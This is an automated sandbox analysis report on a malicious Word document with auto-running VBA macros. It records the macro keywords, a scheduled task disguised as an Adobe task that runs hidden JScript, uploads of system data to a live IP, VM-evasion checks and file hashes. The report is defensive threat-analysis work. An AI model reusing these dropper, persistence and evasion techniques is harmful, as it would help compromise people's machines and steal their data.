Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 20.0.0 |
Analysis ID: | 424458 |
Start time: | 13:59:50 |
Joe Sandbox Product: | Cloud |
Start date: | 09.11.2017 |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | adjusted_records.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43) |
Number of new started processes analysed: | 24 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Detection: | MAL |
Classification: | mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1 |
HCA Information: | |
EGA Information: | Failed |
Cookbook Comments: | |
Warnings: | |
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 100 | 0 - 100 | Report FP / FN |
Confidence |
---|
Strategy | Score | Range | Further Analysis Required? | Confidence | |
---|---|---|---|---|---|
Threshold | 5 | 0 - 5 | false |
Classification |
---|
Analysis Advice |
---|
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior |
Signature Overview |
---|
Software Vulnerabilities: |
---|
Potential document exploit detected (performs HTTP gets) |
Source: global traffic | TCP traffic: |
Potential document exploit detected (unknown TCP traffic) |
Source: global traffic | TCP traffic: |
Document exploit detected (process start blacklist hit) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Networking: |
---|
Downloads files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Downloads files from webservers via HTTP |
Source: global traffic | HTTP traffic detected: |
Found strings which match to known social media urls |
Source: wscript.exe | String found in binary or memory: |
Posts data to webserver |
Source: unknown | HTTP traffic detected: |
Urls found in memory or binary data |
Source: WINWORD.EXE | String found in binary or memory: |
Source: wscript.exe | String found in binary or memory: |
Uses HTTPS |
Source: unknown | Network traffic detected: |
Uses a known web browser user agent for HTTP communication |
Source: global traffic | HTTP traffic detected: |
Boot Survival: |
---|
Uses schtasks.exe or at.exe to add and modify task schedules |
Source: unknown | Process created: |
Stealing of Sensitive Information: |
---|
Leaks process information |
Source: global traffic | TCP traffic: |
Uploads sensitive system information to the internet (privacy leak) |
Source: 192.168.1.16:49163 -> 85.93.2.148:443 | HTTP traffic detected: |
Source: 192.168.1.16:49164 -> 85.93.2.148:443 | HTTP traffic detected: |
Source: 192.168.1.16:49168 -> 85.93.2.148:443 | HTTP traffic detected: |
Source: 192.168.1.16:49169 -> 85.93.2.148:443 | HTTP traffic detected: |
Source: 192.168.1.16:49170 -> 85.93.2.148:443 | HTTP traffic detected: |
Source: 192.168.1.16:49171 -> 85.93.2.148:443 | HTTP traffic detected: |
Persistence and Installation Behavior: |
---|
Installs new ROOT certificates |
Source: C:\Windows\System32\wscript.exe | Registry value created: |
Spreading: |
---|
Creates COM task schedule object (often to register a task for autostart) |
Source: C:\Windows\System32\schtasks.exe | Key opened: |
Performs a network lookup / discovery via ARP |
Source: unknown | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
Performs a network lookup / discovery via net view |
Source: unknown | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
System Summary: |
---|
Executable creates window controls seldom found in malware |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: |
Found graphical window changes (likely an installer) |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: |
Binary contains paths to development resources |
Source: WINWORD.EXE | Binary or memory string: |
Classification label |
Source: classification engine | Classification label: |
Creates files inside the user directory |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Creates temporary files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Document contains an OLE Word Document stream indicating a Microsoft Word file |
Source: adjusted_records.doc | OLE indicator, Word Document stream: |
Document contains summary information with irregular field values |
Source: adjusted_records.doc | OLE document summary: |
Found command line output |
Source: C:\Windows\System32\schtasks.exe | Console Write: |
Source: C:\Windows\System32\cmd.exe | Console Write: |
Queries process information (via WMI, Win32_Process) |
Source: C:\Windows\System32\wscript.exe | WMI Queries: |
Reads ini files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Reads software policies |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
SQL strings found in memory and binary data |
Source: wscript.exe | Binary or memory string: |
Spawns processes |
Source: unknown | Process created: |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
Source: C:\Windows\System32\wscript.exe | Process created: |
Source: C:\Windows\System32\taskeng.exe | Process created: |
Uses an in-process (OLE) Automation server |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Writes ini files |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File written: |
Document contains embedded VBA macros |
Source: adjusted_records.doc | OLE indicator, VBA macros: |
Document contains an embedded VBA macro which executes code when the document is opened / closed |
Source: adjusted_records.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: AutoOpen |
Document contains an embedded VBA macro which may execute processes |
Source: adjusted_records.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: armando |
Document contains an embedded VBA macro with suspicious strings |
Source: adjusted_records.doc | OLE, VBA macro line: |
Source: VBA code instrumentation | OLE, VBA macro: | Name: armando |
Document contains an embedded macro with GUI obfuscation |
Source: adjusted_records.doc | Stream path 'Macros/UserForm1/o' : |
Suspicious javascript / visual basic script found (invalid extension) |
Source: unknown | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
Source: C:\Windows\System32\taskeng.exe | Process created: |
Wscript called in batch mode (suppress errors) |
Source: unknown | Process created: |
Source: C:\Windows\System32\cmd.exe | Process created: |
Source: C:\Windows\System32\taskeng.exe | Process created: |
HIPS / PFW / Operating System Protection Evasion: |
---|
May try to detect the Windows Explorer process (often used for injection) |
Source: taskeng.exe | Binary or memory string: |
Creates a process in suspended mode (likely to inject code) |
Source: C:\Windows\System32\cmd.exe | Process created: |
Source: C:\Windows\System32\wscript.exe | Process created: |
Source: C:\Windows\System32\taskeng.exe | Process created: |
Anti Debugging: |
---|
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) |
Source: C:\Windows\System32\wscript.exe | System information queried: |
Malware Analysis System Evasion: |
---|
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory) |
Source: wscript.exe | Binary or memory string: |
Contains long sleeps (>= 3 min) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Thread delayed: |
Found WSH timer for Javascript or VBS script (likely evasive script) |
Source: C:\Windows\System32\wscript.exe | Window found: |
May sleep (evasive loops) to hinder dynamic analysis |
Source: C:\Windows\System32\wscript.exe TID: 3576 | Thread sleep time: |
Source: C:\Windows\System32\taskeng.exe TID: 3632 | Thread sleep time: |
Source: C:\Windows\System32\taskeng.exe TID: 3656 | Thread sleep time: |
Source: C:\Windows\System32\wscript.exe TID: 3696 | Thread sleep time: |
Source: C:\Windows\System32\wscript.exe TID: 3920 | Thread sleep time: |
Source: C:\Windows\System32\wscript.exe TID: 4076 | Thread sleep time: |
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines) |
Source: C:\Windows\System32\wscript.exe | WMI Queries: |
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) |
Source: C:\Windows\System32\wscript.exe | WMI Queries: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messages (SetErrorMode) |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: |
Source: C:\Windows\System32\cmd.exe | Process information set: |
Source: C:\Windows\System32\wscript.exe | Process information set: |
Monitors certain registry keys / values for changes (often done to protect autostart functionality) |
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: |
Stores large binary data to the registry |
Source: C:\Windows\System32\wscript.exe | Key value created or modified: |
System process connects to network (likely due to code injection or exploit) |
Source: C:\Windows\System32\wscript.exe | Network Connect: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID |
Source: C:\Windows\System32\wscript.exe | Key value queried: |
Behavior Graph |
---|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
14:00:54 | API Interceptor | 1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms |
14:01:04 | API Interceptor | 24x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms |
14:01:06 | Task Scheduler | Run new task: Adobe Acrobat Player Task path: wscript.exe s>//b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log |
14:02:00 | API Interceptor | 2x Sleep call for process: taskeng.exe modified from: 60000ms to: 500ms |
14:02:14 | API Interceptor | 2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms |
Antivirus Detection |
---|
Yara Overview |
---|
Initial Sample |
---|
No yara matches |
---|
PCAP (Network Traffic) |
---|
No yara matches |
---|
Dropped Files |
---|
No yara matches |
---|
Memory Dumps |
---|
No yara matches |
---|
Unpacked PEs |
---|
No yara matches |
---|
Screenshot |
---|
Startup |
---|
Created / dropped Files |
---|
File Type | MD5 | SHA1 | SHA-256 | SHA-512 | Malicious | Reputation |
---|---|---|---|---|---|---|
| FFBF840C65201C3E4B55770BCBBCE76C | 302281235F3033ABCEFEB3C4E4D3F8E065C9544F | AEF29C2E92E9CC496716403005A2E3A3CF4F38A2A9A5F4D32AE45097ED31E1BB | 239B1E072E4566E442152076532CD39EA8E3FCD8CAC44C628B5FE542F153359D3225123A976A13A6746406B5FCBD75F979083AC5A63AA28FCD2AC2AFC0E4CB76 | false | low |
| FFBF840C65201C3E4B55770BCBBCE76C | 302281235F3033ABCEFEB3C4E4D3F8E065C9544F | AEF29C2E92E9CC496716403005A2E3A3CF4F38A2A9A5F4D32AE45097ED31E1BB | 239B1E072E4566E442152076532CD39EA8E3FCD8CAC44C628B5FE542F153359D3225123A976A13A6746406B5FCBD75F979083AC5A63AA28FCD2AC2AFC0E4CB76 | false | low |
| 4873935AD2999E59B2BC7516A0D82554 | F22F6A92AED3FD5A613D55B0201188557D9C5175 | 408CC39FCA0F8581EB48788DCB364B799EAC6533DF52891FB4AE4C630345755B | 02D75E8E4FCD974D9F771339FBB4083D455A0B72EF8A2ACB10898D6BD51E4609F49E4988993418831BA5CBC1383159FD00D9A23533DDC0FB9EA8EC6ADDF5D4ED | false | low |
| AAAFB05B0ADDF2B744EECDC2C757CB90 | F7654885E85A3AA2998D6E966E838EF25B43B8BD | 44FD63AD6F050EF2C9461F5F53977B17234FB2F1C1EDD6632A74E5E2E5E51E5F | 4A5A7FCEB0B51B02554776CA619530520D556FD35423AB3FE44894A3A368BF29802711065A986182C293E240D33E52D089EC46E19A1AD5138F5ED121F6B6E268 | true | low |
| 637708A98E8A464EF7BFB87735260D3D | 7D8563A107E9C30AD05B7052A82475F3DE1A9BB7 | C783E0AB4C32EBFA0349437C8058F2FE05F959CBC8068C344A4E287DF4D15CD7 | EF80C9FDCA0E118CE4949C1EC61849A3D6DD0719BAA5708DC80FAAE6A337092C2A2A66888D6EA361853226858ADD5A34F846F4ED10CEE1B37D3CEB201EFCDFE8 | false | low |
| D63B1B2BAA7842603CC19597B9F3DBAE | 79754FE55FB74E79F804468B9AA51072C3E9F197 | 11404A44CF84EECA5DBAF43D74B4E1A30952D0424CB5CE4FA22C2C1F0B5C73E6 | 8D5ED9245AEB3180DE54A9EF17A34C6ADDB4E0A6A01029D958EF312CACF7D9E18D878F2AA079EF6219E227B59119950A611437E2C3FD6CE29C648F06749AE8C5 | false | low |
| 5D4D94EE7E06BBB0AF9584119797B23A | DBB111419C704F116EFA8E72471DD83E86E49677 | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 | false | low |
| 59CEB3AAFB9B49A443DF794ED1AA4D0D | 729D2678C8A345A2E96428A3FE9901443C23C542 | AE69B1242F205B4725F5086329A68C6A45807C4B3D0D974C4151007F0792E122 | 9C22ABE3CAB4E7115BD3C61996185EF93CA870E9E1C3165C01AF6DFEE111A45D06631269ED1102933D54C092FD454DC795195B6A02937A783477AE879B6079EE | false | low |
| B44447513CD72AB280BD753AE380183B | 49844631D7E09595279C6EF76DBEF7414CF5D0F7 | 86855EE4764321EF557FEFB715A50F988FC8F77CBB83B3923932DF3280E4BDBF | 5F23942630AE21F75FB8DE783A515C76C0F1528BD47EFD86261F94E8E01EADB301E814BA594785A8C9073D4861ACE2C13B3E558F1E2CE393FA98E14300BB6BEB | false | low |
| 33DBB67576DE33CF6C5AB020315007BF | D34EA5DCA7C8AA5B8A8744B2F131B8C7077C484E | 67B0C0E029503F052B41F17E161352B552A71B9FFBF51D6AE3708DA918907F64 | 8467EEED98CE9F989D5AC73048F130B4DB7819AFA595D275CE4439BB205E362EE6260661FEFF23071A7B12AF51577FA516BECDEF3865939132FF05B162636956 | false | low |
| AAAFB05B0ADDF2B744EECDC2C757CB90 | F7654885E85A3AA2998D6E966E838EF25B43B8BD | 44FD63AD6F050EF2C9461F5F53977B17234FB2F1C1EDD6632A74E5E2E5E51E5F | 4A5A7FCEB0B51B02554776CA619530520D556FD35423AB3FE44894A3A368BF29802711065A986182C293E240D33E52D089EC46E19A1AD5138F5ED121F6B6E268 | true | low |
| 33DBB67576DE33CF6C5AB020315007BF | D34EA5DCA7C8AA5B8A8744B2F131B8C7077C484E | 67B0C0E029503F052B41F17E161352B552A71B9FFBF51D6AE3708DA918907F64 | 8467EEED98CE9F989D5AC73048F130B4DB7819AFA595D275CE4439BB205E362EE6260661FEFF23071A7B12AF51577FA516BECDEF3865939132FF05B162636956 | false | low |
Contacted Domains/Contacted IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted IPs |
---|
IP | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|
85.93.2.148 | Germany | 203913 | ARCOMPUS-MEDIANET-ASLB | true |
Static File Info |
---|
General | |
---|---|
File type: | |
TrID: | |
File name: | adjusted_records.doc |
File size: | 545280 |
MD5: | a00ae556a61907d43332449169c88844 |
SHA1: | 74ab28527e0fd7009365018ff6a6eea63fc75a75 |
SHA256: | 84dc0382a4c32cc54a5e92929827f97ee3ceaa50bee6c0831069e78c1144ee30 |
SHA512: | 1e180b6c4f74dfddaabe74570abd1f059002c1c2fc2fc48f8d26fe66f8d125ffd95e3adc0b315e4ff8e15d364959f4bf7cf39e74f9a1b4c6e269cd36c69f8e62 |
File Content Preview: | ........................>......................./...........2...............(...)...*...+...,...-.......I...J.................................................................................................................................................. |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "adjusted_records.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Template: | |
Last Saved By: | |
Revision Number: | 2 |
Total Edit Time: | 0 |
Create Time: | 2017-11-08 15:35:00 |
Last Saved Time: | 2017-11-08 15:35:00 |
Number of Pages: | 1 |
Number of Words: | 0 |
Number of Characters: | 1 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 3135 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 3135 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . ( . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 01 1c 01 00 00 c0 04 00 00 00 01 00 00 06 02 00 00 ff ff ff ff c7 04 00 00 a7 08 00 00 39 09 00 00 00 00 00 00 01 00 00 00 ca 5e a6 a9 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 34 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
True) |
ivwubka, |
armando() |
VB_Name |
VB_Creatable |
StrReverse("ini.daphsarc\") |
VB_Exposed |
ikgygke |
"d.exe |
avfasci.OpenTextFile(ikgygke, |
ygtekra.Close |
VB_TemplateDerived |
(ByVal |
failed! |
AutoOpen() |
ivwubka |
armando |
again" |
Long) |
"ript.exe |
VB_Customizable |
Split(vbspbopegh, |
dwMilliseconds |
CreateObject("Scripting.FileSystemObject") |
vbspbopegh |
ygtekra.WriteLine |
agluksad |
icrobbab |
ygtekra |
avfasci |
"Decryption |
/e:jsc" |
"|*|") |
PtrSafe |
"ript |
Declare |
pbopegh |
"ThisDocument" |
False |
Attribute |
dacxitj |
Private |
Shell |
VB_PredeclaredId |
Sleep |
VB_GlobalNameSpace |
VB_Base |
knyvlaql |
MsgBox |
VBA Code |
---|
VBA File Name: UserForm1.frm, Stream Size: 1331 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1331 |
Data ASCII: | . . . . . . . . . Z . . . . . . . P . . . . . . . a . . . . . . . G . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f4 00 00 00 5a 03 00 00 d8 00 00 00 50 02 00 00 ff ff ff ff 61 03 00 00 b5 03 00 00 47 04 00 00 00 00 00 00 01 00 00 00 ca 5e d7 d1 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 114 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.2359563651 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | Unicode text, UTF-32, big-endian |
Stream Size: | 4096 |
Entropy: | 0.244062958454 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | Unicode text, UTF-32, big-endian |
Stream Size: | 4096 |
Entropy: | 0.393283840733 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . M i c r o s o f t O f f i c e |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 1c 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 07 00 00 00 88 00 00 00 08 00 00 00 9c 00 00 00 09 00 00 00 ac 00 00 00 12 00 00 00 b8 00 00 00 0a 00 00 00 d8 00 00 00 0c 00 00 00 e4 00 00 00 0d 00 00 00 f0 00 00 00 |
Stream Path: 1Table, File Type: data, Stream Size: 6949 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | data |
Stream Size: | 6949 |
Entropy: | 5.92751627912 |
Base64 Encoded: | True |
Data ASCII: | j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . |
Data Raw: | 6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
Stream Path: Data, File Type: data, Stream Size: 393799 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 393799 |
Entropy: | 7.7413813421 |
Base64 Encoded: | True |
Data ASCII: | G . . . D . d . . . . . . . . . . . . . . . . . . . . . . H . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . C . . . ( . . . . A . . . . . . . . . . . . . . . . . . . . . . p . r . o . p . a . r . k . . . . . . . . . . . . . . . R . . . . . . . . . % . . . . L . ] X ` . . . . . ! . . . . . . . . . . D . . . . . = . . F . . { . . . % . . . . L . ] X ` . . . . . ! . . . . . . . E x i f . . I I * . . . . . . . . . . . . . . . . . D u c |
Data Raw: | 47 02 06 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 48 c6 66 80 02 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4c 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 28 00 00 00 04 41 01 00 00 00 05 c1 10 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 70 00 72 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 492 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF, CR line terminators |
Stream Size: | 492 |
Entropy: | 5.34368161244 |
Base64 Encoded: | True |
Data ASCII: | I D = " { F 9 A 5 5 E B 6 - 9 0 E 9 - 4 8 2 4 - 8 9 0 4 - 4 D 7 C 9 8 8 8 E 4 D 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 D B 2 A 0 A 2 E 0 A 2 E 0 A 2 E 0 A 2 E " . . D P B = " 6 6 6 |
Data Raw: | 49 44 3d 22 7b 46 39 41 35 35 45 42 36 2d 39 30 45 39 2d 34 38 32 34 2d 38 39 30 34 2d 34 44 37 43 39 38 38 38 45 34 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.29226192431 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00 |
Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
